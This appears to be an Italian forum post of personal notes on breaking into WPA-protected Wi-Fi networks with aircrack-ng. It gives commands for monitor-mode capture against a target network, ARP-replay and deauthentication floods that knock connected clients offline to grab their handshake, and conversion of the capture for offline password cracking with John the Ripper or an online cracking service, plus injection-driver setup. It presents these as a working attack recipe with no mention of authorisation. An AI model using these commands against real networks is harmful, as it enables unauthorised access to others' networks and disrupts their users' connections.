Codice: Seleziona tutto
systemctl stop NetworkManager.service
iwconfig wlan0 mode monitor
airodump-ng wlan0
airodump-ng -c 11 --bssid (target) -w dump wlan0
ARP metodo pigro
Codice: Seleziona tutto
aireplay-ng --arpreplay -b (bssid target) -h (bssid client connesso) wlan0
ARP metodo aggressivo
Codice: Seleziona tutto
aireplay-ng --deauth 5 -a (bssid target) -c (bssid client connesso) wlan0
ARP altro metodo
Codice: Seleziona tutto
aireplay-ng -0 0 -a (bssid target) wlan0
Quando avvenuto handshake per verificare il cap file aprirlo con WIRESHARK e mettere nel filtro "eapol" se presenti righe sono quelle che contengono psw
------------------------
DECODIFICARE WPA-HANDSHAKE CON JOHN
Codice: Seleziona tutto
aircrack-ng dump-03.cap -J crack
Codice: Seleziona tutto
hccap2john file.hccap > finale
--------------------------
DECODIFICARE WPA-HANDSHAKE ONLINE
https://www.onlinehashcrack.com
--------------------------
https://www.youtube.com/watch?v=GLO9HGDwOY0
https://aircrack-ng.org/doku.php?id=arp ... einjection
good
https://www.kalitutorials.net/2014/03/s ... -kali.html
---------------------------
test packet injection
Codice: Seleziona tutto
aireplay-ng --test wlan0
abilitare TPLINK (https://www.youtube.com/watch?v=NhHiXzqkx_s)
apt update && apt upgrade
apt install -y bc linux-headers-amd64
git clone https://github.com/aircrack-ng/rtl8188eus.git
cd rtl8188eus
cp realtek_blacklist.conf /etc/modprobe.d
make
make install
------